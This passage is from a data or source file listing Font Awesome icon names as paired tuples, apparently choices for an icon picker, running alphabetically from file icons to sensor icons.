heck"),("faFileCode","faFileCode"),("faFileContract","faFileContract"),("faFileCsv","faFileCsv"),("faFileDownload","faFileDownload"),("faFileEdit","faFileEdit"),("faFileExcel","faFileExcel"),("faFileExclamation","faFileExclamation"),("faFileExport","faFileExport"),("faFileImage","faFileImage"),("faFileImport","faFileImport"),("faFileInvoice","faFileInvoice"),("faFileInvoiceDollar","faFileInvoiceDollar"),("faFileMedical","faFileMedical"),("faFileMedicalAlt","faFileMedicalAlt"),("faFileMinus","faFileMinus"),("faFileMusic","faFileMusic"),("faFilePdf","faFilePdf"),("faFilePlus","faFilePlus"),("faFilePowerpoint","faFilePowerpoint"),("faFilePrescription","faFilePrescription"),("faFileSearch","faFileSearch"),("faFileSignature","faFileSignature"),("faFileSpreadsheet","faFileSpreadsheet"),("faFileTimes","faFileTimes"),("faFileUpload","faFileUpload"),("faFileUser","faFileUser"),("faFileVideo","faFileVideo"),("faFileWord","faFileWord"),("faFilesMedical","faFilesMedical"),("faFill","faFill"),("faFillDrip","faFillDrip"),("faFilm","faFilm"),("faFilmAlt","faFilmAlt"),("faFilmCanister","faFilmCanister"),("faFilter","faFilter"),("faFingerprint","faFingerprint"),("faFire","faFire"),("faFireAlt","faFireAlt"),("faFireExtinguisher","faFireExtinguisher"),("faFireSmoke","faFireSmoke"),("faFirefox","faFirefox"),("faFirefoxBrowser","faFirefoxBrowser"),("faFireplace","faFireplace"),("faFirstAid","faFirstAid"),("faFirstOrder","faFirstOrder"),("faFirstOrderAlt","faFirstOrderAlt"),("faFirstdraft","faFirstdraft"),("faFish","faFish"),("faFishCooked","faFishCooked"),("faFistRaised","faFistRaised"),("faFlag","faFlag"),("faFlagAlt","faFlagAlt"),("faFlagCheckered","faFlagCheckered"),("faFlagUsa","faFlagUsa"),("faFlame","faFlame"),("faFlashlight","faFlashlight"),("faFlask","faFlask"),("faFlaskPoison","faFlaskPoison"),("faFlaskPotion","faFlaskPotion"),("faFlickr","faFlickr"),("faFlipboard","faFlipboard"),("faFlower","faFlower"),("faFlowerDaffodil","faFlowerDaffodil"),("faFlowerTulip","faFlowerTulip"),("faFlushed","faFlushed"),("faFlute","faFlute"),("faFluxCapacitor","faFluxCapacitor"),("faFly","faFly"),("faFog","faFog"),("faFolder","faFolder"),("faFolderDownload","faFolderDownload"),("faFolderMinus","faFolderMinus"),("faFolderOpen","faFolderOpen"),("faFolderPlus","faFolderPlus"),("faFolderTimes","faFolderTimes"),("faFolderTree","faFolderTree"),("faFolderUpload","faFolderUpload"),("faFolders","faFolders"),("faFont","faFont"),("faFontAwesome","faFontAwesome"),("faFontAwesomeAlt","faFontAwesomeAlt"),("faFontAwesomeFlag","faFontAwesomeFlag"),("faFontAwesomeLogoFull","faFontAwesomeLogoFull"),("faFontCase","faFontCase"),("faFonticons","faFonticons"),("faFonticonsFi","faFonticonsFi"),("faFootballBall","faFootballBall"),("faFootballHelmet","faFootballHelmet"),("faForklift","faForklift"),("faFortAwesome","faFortAwesome"),("faFortAwesomeAlt","faFortAwesomeAlt"),("faForumbee","faForumbee"),("faForward","faForward"),("faFoursquare","faFoursquare"),("faFragile","faFragile"),("faFreeCodeCamp","faFreeCodeCamp"),("faFreebsd","faFreebsd"),("faFrenchFries","faFrenchFries"),("faFrog","faFrog"),("faFrostyHead","faFrostyHead"),("faFrown","faFrown"),("faFrownOpen","faFrownOpen"),("faFulcrum","faFulcrum"),("faFunction","faFunction"),("faFunnelDollar","faFunnelDollar"),("faFutbol","faFutbol"),("faGalacticRepublic","faGalacticRepublic"),("faGalacticSenate","faGalacticSenate"),("faGalaxy","faGalaxy"),("faGameBoard","faGameBoard"),("faGameBoardAlt","faGameBoardAlt"),("faGameConsoleHandheld","faGameConsoleHandheld"),("faGamepad","faGamepad"),("faGamepadAlt","faGamepadAlt"),("faGarage","faGarage"),("faGarageCar","faGarageCar"),("faGarageOpen","faGarageOpen"),("faGasPump","faGasPump"),("faGasPumpSlash","faGasPumpSlash"),("faGavel","faGavel"),("faGem","faGem"),("faGenderless","faGenderless"),("faGetPocket","faGetPocket"),("faGg","faGg"),("faGgCircle","faGgCircle"),("faGhost","faGhost"),("faGift","faGift"),("faGiftCard","faGiftCard"),("faGifts","faGifts"),("faGingerbreadMan","faGingerbreadMan"),("faGit","faGit"),("faGitAlt","faGitAlt"),("faGitSquare","faGitSquare"),("faGithub","faGithub"),("faGithubAlt","faGithubAlt"),("faGithubSquare","faGithubSquare"),("faGitkraken","faGitkraken"),("faGitlab","faGitlab"),("faGitter","faGitter"),("faGlass","faGlass"),("faGlassChampagne","faGlassChampagne"),("faGlassCheers","faGlassCheers"),("faGlassCitrus","faGlassCitrus"),("faGlassMartini","faGlassMartini"),("faGlassMartiniAlt","faGlassMartiniAlt"),("faGlassWhiskey","faGlassWhiskey"),("faGlassWhiskeyRocks","faGlassWhiskeyRocks"),("faGlasses","faGlasses"),("faGlassesAlt","faGlassesAlt"),("faGlide","faGlide"),("faGlideG","faGlideG"),("faGlobe","faGlobe"),("faGlobeAfrica","faGlobeAfrica"),("faGlobeAmericas","faGlobeAmericas"),("faGlobeAsia","faGlobeAsia"),("faGlobeEurope","faGlobeEurope"),("faGlobeSnow","faGlobeSnow"),("faGlobeStand","faGlobeStand"),("faGofore","faGofore"),("faGolfBall","faGolfBall"),("faGolfClub","faGolfClub"),("faGoodreads","faGoodreads"),("faGoodreadsG","faGoodreadsG"),("faGoogle","faGoogle"),("faGoogleDrive","faGoogleDrive"),("faGooglePay","faGooglePay"),("faGooglePlay","faGooglePlay"),("faGooglePlus","faGooglePlus"),("faGooglePlusG","faGooglePlusG"),("faGooglePlusSquare","faGooglePlusSquare"),("faGoogleWallet","faGoogleWallet"),("faGopuram","faGopuram"),("faGraduationCap","faGraduationCap"),("faGramophone","faGramophone"),("faGratipay","faGratipay"),("faGrav","faGrav"),("faGreaterThan","faGreaterThan"),("faGreaterThanEqual","faGreaterThanEqual"),("faGrimace","faGrimace"),("faGrin","faGrin"),("faGrinAlt","faGrinAlt"),("faGrinBeam","faGrinBeam"),("faGrinBeamSweat","faGrinBeamSweat"),("faGrinHearts","faGrinHearts"),("faGrinSquint","faGrinSquint"),("faGrinSquintTears","faGrinSquintTears"),("faGrinStars","faGrinStars"),("faGrinTears","faGrinTears"),("faGrinTongue","faGrinTongue"),("faGrinTongueSquint","faGrinTongueSquint"),("faGrinTongueWink","faGrinTongueWink"),("faGrinWink","faGrinWink"),("faGripHorizontal","faGripHorizontal"),("faGripLines","faGripLines"),("faGripLinesVertical","faGripLinesVertical"),("faGripVertical","faGripVertical"),("faGripfire","faGripfire"),("faGrunt","faGrunt"),("faGuilded","faGuilded"),("faGuitar","faGuitar"),("faGuitarElectric","faGuitarElectric"),("faGuitars","faGuitars"),("faGulp","faGulp"),("faHSquare","faHSquare"),("faH1","faH1"),("faH2","faH2"),("faH3","faH3"),("faH4","faH4"),("faHackerNews","faHackerNews"),("faHackerNewsSquare","faHackerNewsSquare"),("faHackerrank","faHackerrank"),("faHamburger","faHamburger"),("faHammer","faHammer"),("faHammerWar","faHammerWar"),("faHamsa","faHamsa"),("faHandHeart","faHandHeart"),("faHandHolding","faHandHolding"),("faHandHoldingBox","faHandHoldingBox"),("faHandHoldingHeart","faHandHoldingHeart"),("faHandHoldingMagic","faHandHoldingMagic"),("faHandHoldingMedical","faHandHoldingMedical"),("faHandHoldingSeedling","faHandHoldingSeedling"),("faHandHoldingUsd","faHandHoldingUsd"),("faHandHoldingWater","faHandHoldingWater"),("faHandLizard","faHandLizard"),("faHandMiddleFinger","faHandMiddleFinger"),("faHandPaper","faHandPaper"),("faHandPeace","faHandPeace"),("faHandPointDown","faHandPointDown"),("faHandPointLeft","faHandPointLeft"),("faHandPointRight","faHandPointRight"),("faHandPointUp","faHandPointUp"),("faHandPointer","faHandPointer"),("faHandReceiving","faHandReceiving"),("faHandRock","faHandRock"),("faHandScissors","faHandScissors"),("faHandSparkles","faHandSparkles"),("faHandSpock","faHandSpock"),("faHands","faHands"),("faHandsHeart","faHandsHeart"),("faHandsHelping","faHandsHelping"),("faHandsUsd","faHandsUsd"),("faHandsWash","faHandsWash"),("faHandshake","faHandshake"),("faHandshakeAlt","faHandshakeAlt"),("faHandshakeAltSlash","faHandshakeAltSlash"),("faHandshakeSlash","faHandshakeSlash"),("faHanukiah","faHanukiah"),("faHardHat","faHardHat"),("faHashtag","faHashtag"),("faHatChef","faHatChef"),("faHatCowboy","faHatCowboy"),("faHatCowboySide","faHatCowboySide"),("faHatSanta","faHatSanta"),("faHatWinter","faHatWinter"),("faHatWitch","faHatWitch"),("faHatWizard","faHatWizard"),("faHdd","faHdd"),("faHeadSide","faHeadSide"),("faHeadSideBrain","faHeadSideBrain"),("faHeadSideCough","faHeadSideCough"),("faHeadSideCoughSlash","faHeadSideCoughSlash"),("faHeadSideHeadphones","faHeadSideHeadphones"),("faHeadSideMask","faHeadSideMask"),("faHeadSideMedical","faHeadSideMedical"),("faHeadSideVirus","faHeadSideVirus"),("faHeadVr","faHeadVr"),("faHeading","faHeading"),("faHeadphones","faHeadphones"),("faHeadphonesAlt","faHeadphonesAlt"),("faHeadset","faHeadset"),("faHeart","faHeart"),("faHeartBroken","faHeartBroken"),("faHeartCircle","faHeartCircle"),("faHeartRate","faHeartRate"),("faHeartSquare","faHeartSquare"),("faHeartbeat","faHeartbeat"),("faHeat","faHeat"),("faHelicopter","faHelicopter"),("faHelmetBattle","faHelmetBattle"),("faHexagon","faHexagon"),("faHighlighter","faHighlighter"),("faHiking","faHiking"),("faHippo","faHippo"),("faHips","faHips"),("faHireAHelper","faHireAHelper"),("faHistory","faHistory"),("faHive","faHive"),("faHockeyMask","faHockeyMask"),("faHockeyPuck","faHockeyPuck"),("faHockeySticks","faHockeySticks"),("faHollyBerry","faHollyBerry"),("faHome","faHome"),("faHomeAlt","faHomeAlt"),("faHomeHeart","faHomeHeart"),("faHomeLg","faHomeLg"),("faHomeLgAlt","faHomeLgAlt"),("faHoodCloak","faHoodCloak"),("faHooli","faHooli"),("faHorizontalRule","faHorizontalRule"),("faHornbill","faHornbill"),("faHorse","faHorse"),("faHorseHead","faHorseHead"),("faHorseSaddle","faHorseSaddle"),("faHospital","faHospital"),("faHospitalAlt","faHospitalAlt"),("faHospitalSymbol","faHospitalSymbol"),("faHospitalUser","faHospitalUser"),("faHospitals","faHospitals"),("faHotTub","faHotTub"),("faHotdog","faHotdog"),("faHotel","faHotel"),("faHotjar","faHotjar"),("faHourglass","faHourglass"),("faHourglassEnd","faHourglassEnd"),("faHourglassHalf","faHourglassHalf"),("faHourglassStart","faHourglassStart"),("faHouse","faHouse"),("faHouseDamage","faHouseDamage"),("faHouseDay","faHouseDay"),("faHouseFlood","faHouseFlood"),("faHouseLeave","faHouseLeave"),("faHouseNight","faHouseNight"),("faHouseReturn","faHouseReturn"),("faHouseSignal","faHouseSignal"),("faHouseUser","faHouseUser"),("faHouzz","faHouzz"),("faHryvnia","faHryvnia"),("faHtml5","faHtml5"),("faHubspot","faHubspot"),("faHumidity","faHumidity"),("faHurricane","faHurricane"),("faICursor","faICursor"),("faIceCream","faIceCream"),("faIceSkate","faIceSkate"),("faIcicles","faIcicles"),("faIcons","faIcons"),("faIconsAlt","faIconsAlt"),("faIdBadge","faIdBadge"),("faIdCard","faIdCard"),("faIdCardAlt","faIdCardAlt"),("faIdeal","faIdeal"),("faIgloo","faIgloo"),("faImage","faImage"),("faImagePolaroid","faImagePolaroid"),("faImages","faImages"),("faImdb","faImdb"),("faInbox","faInbox"),("faInboxIn","faInboxIn"),("faInboxOut","faInboxOut"),("faIndent","faIndent"),("faIndustry","faIndustry"),("faIndustryAlt","faIndustryAlt"),("faInfinity","faInfinity"),("faInfo","faInfo"),("faInfoCircle","faInfoCircle"),("faInfoSquare","faInfoSquare"),("faInhaler","faInhaler"),("faInnosoft","faInnosoft"),("faInstagram","faInstagram"),("faInstagramSquare","faInstagramSquare"),("faInstalod","faInstalod"),("faIntegral","faIntegral"),("faIntercom","faIntercom"),("faInternetExplorer","faInternetExplorer"),("faIntersection","faIntersection"),("faInventory","faInventory"),("faInvision","faInvision"),("faIoxhost","faIoxhost"),("faIslandTropical","faIslandTropical"),("faItalic","faItalic"),("faItchIo","faItchIo"),("faItunes","faItunes"),("faItunesNote","faItunesNote"),("faJackOLantern","faJackOLantern"),("faJava","faJava"),("faJedi","faJedi"),("faJediOrder","faJediOrder"),("faJenkins","faJenkins"),("faJira","faJira"),("faJoget","faJoget"),("faJoint","faJoint"),("faJoomla","faJoomla"),("faJournalWhills","faJournalWhills"),("faJoystick","faJoystick"),("faJs","faJs"),("faJsSquare","faJsSquare"),("faJsfiddle","faJsfiddle"),("faJug","faJug"),("faKaaba","faKaaba"),("faKaggle","faKaggle"),("faKazoo","faKazoo"),("faKerning","faKerning"),("faKey","faKey"),("faKeySkeleton","faKeySkeleton"),("faKeybase","faKeybase"),("faKeyboard","faKeyboard"),("faKeycdn","faKeycdn"),("faKeynote","faKeynote"),("faKhanda","faKhanda"),("faKickstarter","faKickstarter"),("faKickstarterK","faKickstarterK"),("faKidneys","faKidneys"),("faKiss","faKiss"),("faKissBeam","faKissBeam"),("faKissWinkHeart","faKissWinkHeart"),("faKite","faKite"),("faKiwiBird","faKiwiBird"),("faKnifeKitchen","faKnifeKitchen"),("faKorvue","faKorvue"),("faLambda","faLambda"),("faLamp","faLamp"),("faLampDesk","faLampDesk"),("faLampFloor","faLampFloor"),("faLandmark","faLandmark"),("faLandmarkAlt","faLandmarkAlt"),("faLanguage","faLanguage"),("faLaptop","faLaptop"),("faLaptopCode","faLaptopCode"),("faLaptopHouse","faLaptopHouse"),("faLaptopMedical","faLaptopMedical"),("faLaravel","faLaravel"),("faLasso","faLasso"),("faLastfm","faLastfm"),("faLastfmSquare","faLastfmSquare"),("faLaugh","faLaugh"),("faLaughBeam","faLaughBeam"),("faLaughSquint","faLaughSquint"),("faLaughWink","faLaughWink"),("faLayerGroup","faLayerGroup"),("faLayerMinus","faLayerMinus"),("faLayerPlus","faLayerPlus"),("faLeaf","faLeaf"),("faLeafHeart","faLeafHeart"),("faLeafMaple","faLeafMaple"),("faLeafOak","faLeafOak"),("faLeanpub","faLeanpub"),("faLemon","faLemon"),("faLess","faLess"),("faLessThan","faLessThan"),("faLessThanEqual","faLessThanEqual"),("faLevelDown","faLevelDown"),("faLevelDownAlt","faLevelDownAlt"),("faLevelUp","faLevelUp"),("faLevelUpAlt","faLevelUpAlt"),("faLifeRing","faLifeRing"),("faLightCeiling","faLightCeiling"),("faLightSwitch","faLightSwitch"),("faLightSwitchOff","faLightSwitchOff"),("faLightSwitchOn","faLightSwitchOn"),("faLightbulb","faLightbulb"),("faLightbulbDollar","faLightbulbDollar"),("faLightbulbExclamation","faLightbulbExclamation"),("faLightbulbOn","faLightbulbOn"),("faLightbulbSlash","faLightbulbSlash"),("faLightsHoliday","faLightsHoliday"),("faLine","faLine"),("faLineColumns","faLineColumns"),("faLineHeight","faLineHeight"),("faLink","faLink"),("faLinkedin","faLinkedin"),("faLinkedinIn","faLinkedinIn"),("faLinode","faLinode"),("faLinux","faLinux"),("faLips","faLips"),("faLiraSign","faLiraSign"),("faList","faList"),("faListAlt","faListAlt"),("faListMusic","faListMusic"),("faListOl","faListOl"),("faListUl","faListUl"),("faLocation","faLocation"),("faLocationArrow","faLocationArrow"),("faLocationCircle","faLocationCircle"),("faLocationSlash","faLocationSlash"),("faLock","faLock"),("faLockAlt","faLockAlt"),("faLockOpen","faLockOpen"),("faLockOpenAlt","faLockOpenAlt"),("faLongArrowAltDown","faLongArrowAltDown"),("faLongArrowAltLeft","faLongArrowAltLeft"),("faLongArrowAltRight","faLongArrowAltRight"),("faLongArrowAltUp","faLongArrowAltUp"),("faLongArrowDown","faLongArrowDown"),("faLongArrowLeft","faLongArrowLeft"),("faLongArrowRight","faLongArrowRight"),("faLongArrowUp","faLongArrowUp"),("faLoveseat","faLoveseat"),("faLowVision","faLowVision"),("faLuchador","faLuchador"),("faLuggageCart","faLuggageCart"),("faLungs","faLungs"),("faLungsVirus","faLungsVirus"),("faLyft","faLyft"),("faMace","faMace"),("faMagento","faMagento"),("faMagic","faMagic"),("faMagnet","faMagnet"),("faMailBulk","faMailBulk"),("faMailbox","faMailbox"),("faMailchimp","faMailchimp"),("faMale","faMale"),("faMandalorian","faMandalorian"),("faMandolin","faMandolin"),("faMap","faMap"),("faMapMarked","faMapMarked"),("faMapMarkedAlt","faMapMarkedAlt"),("faMapMarker","faMapMarker"),("faMapMarkerAlt","faMapMarkerAlt"),("faMapMarkerAltSlash","faMapMarkerAltSlash"),("faMapMarkerCheck","faMapMarkerCheck"),("faMapMarkerEdit","faMapMarkerEdit"),("faMapMarkerExclamation","faMapMarkerExclamation"),("faMapMarkerMinus","faMapMarkerMinus"),("faMapMarkerPlus","faMapMarkerPlus"),("faMapMarkerQuestion","faMapMarkerQuestion"),("faMapMarkerSlash","faMapMarkerSlash"),("faMapMarkerSmile","faMapMarkerSmile"),("faMapMarkerTimes","faMapMarkerTimes"),("faMapPin","faMapPin"),("faMapSigns","faMapSigns"),("faMarkdown","faMarkdown"),("faMarker","faMarker"),("faMars","faMars"),("faMarsDouble","faMarsDouble"),("faMarsStroke","faMarsStroke"),("faMarsStrokeH","faMarsStrokeH"),("faMarsStrokeV","faMarsStrokeV"),("faMask","faMask"),("faMastodon","faMastodon"),("faMaxcdn","faMaxcdn"),("faMdb","faMdb"),("faMeat","faMeat"),("faMedal","faMedal"),("faMedapps","faMedapps"),("faMedium","faMedium"),("faMediumM","faMediumM"),("faMedkit","faMedkit"),("faMedrt","faMedrt"),("faMeetup","faMeetup"),("faMegaphone","faMegaphone"),("faMegaport","faMegaport"),("faMeh","faMeh"),("faMehBlank","faMehBlank"),("faMehRollingEyes","faMehRollingEyes"),("faMemory","faMemory"),("faMendeley","faMendeley"),("faMenorah","faMenorah"),("faMercury","faMercury"),("faMeteor","faMeteor"),("faMicroblog","faMicroblog"),("faMicrochip","faMicrochip"),("faMicrophone","faMicrophone"),("faMicrophoneAlt","faMicrophoneAlt"),("faMicrophoneAltSlash","faMicrophoneAltSlash"),("faMicrophoneSlash","faMicrophoneSlash"),("faMicrophoneStand","faMicrophoneStand"),("faMicroscope","faMicroscope"),("faMicrosoft","faMicrosoft"),("faMicrowave","faMicrowave"),("faMindShare","faMindShare"),("faMinus","faMinus"),("faMinusCircle","faMinusCircle"),("faMinusHexagon","faMinusHexagon"),("faMinusOctagon","faMinusOctagon"),("faMinusSquare","faMinusSquare"),("faMistletoe","faMistletoe"),("faMitten","faMitten"),("faMix","faMix"),("faMixcloud","faMixcloud"),("faMixer","faMixer"),("faMizuni","faMizuni"),("faMobile","faMobile"),("faMobileAlt","faMobileAlt"),("faMobileAndroid","faMobileAndroid"),("faMobileAndroidAlt","faMobileAndroidAlt"),("faModx","faModx"),("faMonero","faMonero"),("faMoneyBill","faMoneyBill"),("faMoneyBillAlt","faMoneyBillAlt"),("faMoneyBillWave","faMoneyBillWave"),("faMoneyBillWaveAlt","faMoneyBillWaveAlt"),("faMoneyCheck","faMoneyCheck"),("faMoneyCheckAlt","faMoneyCheckAlt"),("faMoneyCheckEdit","faMoneyCheckEdit"),("faMoneyCheckEditAlt","faMoneyCheckEditAlt"),("faMonitorHeartRate","faMonitorHeartRate"),("faMonkey","faMonkey"),("faMonument","faMonument"),("faMoon","faMoon"),("faMoonCloud","faMoonCloud"),("faMoonStars","faMoonStars"),("faMortarPestle","faMortarPestle"),("faMosque","faMosque"),("faMotorcycle","faMotorcycle"),("faMountain","faMountain"),("faMountains","faMountains"),("faMouse","faMouse"),("faMouseAlt","faMouseAlt"),("faMousePointer","faMousePointer"),("faMp3Player","faMp3Player"),("faMug","faMug"),("faMugHot","faMugHot"),("faMugMarshmallows","faMugMarshmallows"),("faMugTea","faMugTea"),("faMusic","faMusic"),("faMusicAlt","faMusicAlt"),("faMusicAltSlash","faMusicAltSlash"),("faMusicSlash","faMusicSlash"),("faNapster","faNapster"),("faNarwhal","faNarwhal"),("faNeos","faNeos"),("faNetworkWired","faNetworkWired"),("faNeuter","faNeuter"),("faNewspaper","faNewspaper"),("faNimblr","faNimblr"),("faNode","faNode"),("faNodeJs","faNodeJs"),("faNotEqual","faNotEqual"),("faNotesMedical","faNotesMedical"),("faNpm","faNpm"),("faNs8","faNs8"),("faNutritionix","faNutritionix"),("faObjectGroup","faObjectGroup"),("faObjectUngroup","faObjectUngroup"),("faOctagon","faOctagon"),("faOctopusDeploy","faOctopusDeploy"),("faOdnoklassniki","faOdnoklassniki"),("faOdnoklassnikiSquare","faOdnoklassnikiSquare"),("faOilCan","faOilCan"),("faOilTemp","faOilTemp"),("faOldRepublic","faOldRepublic"),("faOm","faOm"),("faOmega","faOmega"),("faOpencart","faOpencart"),("faOpenid","faOpenid"),("faOpera","faOpera"),("faOptinMonster","faOptinMonster"),("faOrcid","faOrcid"),("faOrnament","faOrnament"),("faOsi","faOsi"),("faOtter","faOtter"),("faOutdent","faOutdent"),("faOutlet","faOutlet"),("faOven","faOven"),("faOverline","faOverline"),("faPageBreak","faPageBreak"),("faPage4","faPage4"),("faPagelines","faPagelines"),("faPager","faPager"),("faPaintBrush","faPaintBrush"),("faPaintBrushAlt","faPaintBrushAlt"),("faPaintRoller","faPaintRoller"),("faPalette","faPalette"),("faPalfed","faPalfed"),("faPallet","faPallet"),("faPalletAlt","faPalletAlt"),("faPaperPlane","faPaperPlane"),("faPaperclip","faPaperclip"),("faParachuteBox","faParachuteBox"),("faParagraph","faParagraph"),("faParagraphRtl","faParagraphRtl"),("faParking","faParking"),("faParkingCircle","faParkingCircle"),("faParkingCircleSlash","faParkingCircleSlash"),("faParkingSlash","faParkingSlash"),("faPassport","faPassport"),("faPastafarianism","faPastafarianism"),("faPaste","faPaste"),("faPatreon","faPatreon"),("faPause","faPause"),("faPauseCircle","faPauseCircle"),("faPaw","faPaw"),("faPawAlt","faPawAlt"),("faPawClaws","faPawClaws"),("faPaypal","faPaypal"),("faPeace","faPeace"),("faPegasus","faPegasus"),("faPen","faPen"),("faPenAlt","faPenAlt"),("faPenFancy","faPenFancy"),("faPenNib","faPenNib"),("faPenSquare","faPenSquare"),("faPencil","faPencil"),("faPencilAlt","faPencilAlt"),("faPencilPaintbrush","faPencilPaintbrush"),("faPencilRuler","faPencilRuler"),("faPennant","faPennant"),("faPennyArcade","faPennyArcade"),("faPeopleArrows","faPeopleArrows"),("faPeopleCarry","faPeopleCarry"),("faPepperHot","faPepperHot"),("faPerbyte","faPerbyte"),("faPercent","faPercent"),("faPercentage","faPercentage"),("faPeriscope","faPeriscope"),("faPersonBooth","faPersonBooth"),("faPersonCarry","faPersonCarry"),("faPersonDolly","faPersonDolly"),("faPersonDollyEmpty","faPersonDollyEmpty"),("faPersonSign","faPersonSign"),("faPhabricator","faPhabricator"),("faPhoenixFramework","faPhoenixFramework"),("faPhoenixSquadron","faPhoenixSquadron"),("faPhone","faPhone"),("faPhoneAlt","faPhoneAlt"),("faPhoneLaptop","faPhoneLaptop"),("faPhoneOffice","faPhoneOffice"),("faPhonePlus","faPhonePlus"),("faPhoneRotary","faPhoneRotary"),("faPhoneSlash","faPhoneSlash"),("faPhoneSquare","faPhoneSquare"),("faPhoneSquareAlt","faPhoneSquareAlt"),("faPhoneVolume","faPhoneVolume"),("faPhotoVideo","faPhotoVideo"),("faPhp","faPhp"),("faPi","faPi"),("faPiano","faPiano"),("faPianoKeyboard","faPianoKeyboard"),("faPie","faPie"),("faPiedPiper","faPiedPiper"),("faPiedPiperAlt","faPiedPiperAlt"),("faPiedPiperHat","faPiedPiperHat"),("faPiedPiperPp","faPiedPiperPp"),("faPiedPiperSquare","faPiedPiperSquare"),("faPig","faPig"),("faPiggyBank","faPiggyBank"),("faPills","faPills"),("faPinterest","faPinterest"),("faPinterestP","faPinterestP"),("faPinterestSquare","faPinterestSquare"),("faPizza","faPizza"),("faPizzaSlice","faPizzaSlice"),("faPlaceOfWorship","faPlaceOfWorship"),("faPlane","faPlane"),("faPlaneAlt","faPlaneAlt"),("faPlaneArrival","faPlaneArrival"),("faPlaneDeparture","faPlaneDeparture"),("faPlaneSlash","faPlaneSlash"),("faPlanetMoon","faPlanetMoon"),("faPlanetRinged","faPlanetRinged"),("faPlay","faPlay"),("faPlayCircle","faPlayCircle"),("faPlaystation","faPlaystation"),("faPlug","faPlug"),("faPlus","faPlus"),("faPlusCircle","faPlusCircle"),("faPlusHexagon","faPlusHexagon"),("faPlusOctagon","faPlusOctagon"),("faPlusSquare","faPlusSquare"),("faPodcast","faPodcast"),("faPodium","faPodium"),("faPodiumStar","faPodiumStar"),("faPoliceBox","faPoliceBox"),("faPoll","faPoll"),("faPollH","faPollH"),("faPollPeople","faPollPeople"),("faPoo","faPoo"),("faPooStorm","faPooStorm"),("faPoop","faPoop"),("faPopcorn","faPopcorn"),("faPortalEnter","faPortalEnter"),("faPortalExit","faPortalExit"),("faPortrait","faPortrait"),("faPoundSign","faPoundSign"),("faPowerOff","faPowerOff"),("faPray","faPray"),("faPrayingHands","faPrayingHands"),("faPrescription","faPrescription"),("faPrescriptionBottle","faPrescriptionBottle"),("faPrescriptionBottleAlt","faPrescriptionBottleAlt"),("faPresentation","faPresentation"),("faPrint","faPrint"),("faPrintSearch","faPrintSearch"),("faPrintSlash","faPrintSlash"),("faProcedures","faProcedures"),("faProductHunt","faProductHunt"),("faProjectDiagram","faProjectDiagram"),("faProjector","faProjector"),("faPumpMedical","faPumpMedical"),("faPumpSoap","faPumpSoap"),("faPumpkin","faPumpkin"),("faPushed","faPushed"),("faPuzzlePiece","faPuzzlePiece"),("faPython","faPython"),("faQq","faQq"),("faQrcode","faQrcode"),("faQuestion","faQuestion"),("faQuestionCircle","faQuestionCircle"),("faQuestionSquare","faQuestionSquare"),("faQuidditch","faQuidditch"),("faQuinscape","faQuinscape"),("faQuora","faQuora"),("faQuoteLeft","faQuoteLeft"),("faQuoteRight","faQuoteRight"),("faQuran","faQuran"),("faRProject","faRProject"),("faRabbit","faRabbit"),("faRabbitFast","faRabbitFast"),("faRacquet","faRacquet"),("faRadar","faRadar"),("faRadiation","faRadiation"),("faRadiationAlt","faRadiationAlt"),("faRadio","faRadio"),("faRadioAlt","faRadioAlt"),("faRainbow","faRainbow"),("faRaindrops","faRaindrops"),("faRam","faRam"),("faRampLoading","faRampLoading"),("faRandom","faRandom"),("faRaspberryPi","faRaspberryPi"),("faRavelry","faRavelry"),("faRaygun","faRaygun"),("faReact","faReact"),("faReacteurope","faReacteurope"),("faReadme","faReadme"),("faRebel","faRebel"),("faReceipt","faReceipt"),("faRecordVinyl","faRecordVinyl"),("faRectangleLandscape","faRectangleLandscape"),("faRectanglePortrait","faRectanglePortrait"),("faRectangleWide","faRectangleWide"),("faRecycle","faRecycle"),("faRedRiver","faRedRiver"),("faReddit","faReddit"),("faRedditAlien","faRedditAlien"),("faRedditSquare","faRedditSquare"),("faRedhat","faRedhat"),("faRedo","faRedo"),("faRedoAlt","faRedoAlt"),("faRefrigerator","faRefrigerator"),("faRegistered","faRegistered"),("faRemoveFormat","faRemoveFormat"),("faRenren","faRenren"),("faRepeat","faRepeat"),("faRepeat1","faRepeat1"),("faRepeat1Alt","faRepeat1Alt"),("faRepeatAlt","faRepeatAlt"),("faReply","faReply"),("faReplyAll","faReplyAll"),("faReplyd","faReplyd"),("faRepublican","faRepublican"),("faResearchgate","faResearchgate"),("faResolving","faResolving"),("faRestroom","faRestroom"),("faRetweet","faRetweet"),("faRetweetAlt","faRetweetAlt"),("faRev","faRev"),("faRibbon","faRibbon"),("faRing","faRing"),("faRingsWedding","faRingsWedding"),("faRoad","faRoad"),("faRobot","faRobot"),("faRocket","faRocket"),("faRocketLaunch","faRocketLaunch"),("faRocketchat","faRocketchat"),("faRockrms","faRockrms"),("faRoute","faRoute"),("faRouteHighway","faRouteHighway"),("faRouteInterstate","faRouteInterstate"),("faRouter","faRouter"),("faRss","faRss"),("faRssSquare","faRssSquare"),("faRubleSign","faRubleSign"),("faRuler","faRuler"),("faRulerCombined","faRulerCombined"),("faRulerHorizontal","faRulerHorizontal"),("faRulerTriangle","faRulerTriangle"),("faRulerVertical","faRulerVertical"),("faRunning","faRunning"),("faRupeeSign","faRupeeSign"),("faRust","faRust"),("faRv","faRv"),("faSack","faSack"),("faSackDollar","faSackDollar"),("faSadCry","faSadCry"),("faSadTear","faSadTear"),("faSafari","faSafari"),("faSalad","faSalad"),("faSalesforce","faSalesforce"),("faSandwich","faSandwich"),("faSass","faSass"),("faSatellite","faSatellite"),("faSatelliteDish","faSatelliteDish"),("faSausage","faSausage"),("faSave","faSave"),("faSaxHot","faSaxHot"),("faSaxophone","faSaxophone"),("faScalpel","faScalpel"),("faScalpelPath","faScalpelPath"),("faScanner","faScanner"),("faScannerImage","faScannerImage"),("faScannerKeyboard","faScannerKeyboard"),("faScannerTouchscreen","faScannerTouchscreen"),("faScarecrow","faScarecrow"),("faScarf","faScarf"),("faSchlix","faSchlix"),("faSchool","faSchool"),("faScrewdriver","faScrewdriver"),("faScribd","faScribd"),("faScroll","faScroll"),("faScrollOld","faScrollOld"),("faScrubber","faScrubber"),("faScythe","faScythe"),("faSdCard","faSdCard"),("faSearch","faSearch"),("faSearchDollar","faSearchDollar"),("faSearchLocation","faSearchLocation"),("faSearchMinus","faSearchMinus"),("faSearchPlus","faSearchPlus"),("faSearchengin","faSearchengin"),("faSeedling","faSeedling"),("faSellcast","faSellcast"),("faSellsy","faSellsy"),("faSendBack","faSendBack"),("faSendBackward","faSendBackward"),("faSensor","faSensor"),("faSensorAlert","faSensorAlert"),("faSensorFire","faSensorFire"),("faSensorOn","faSensorOn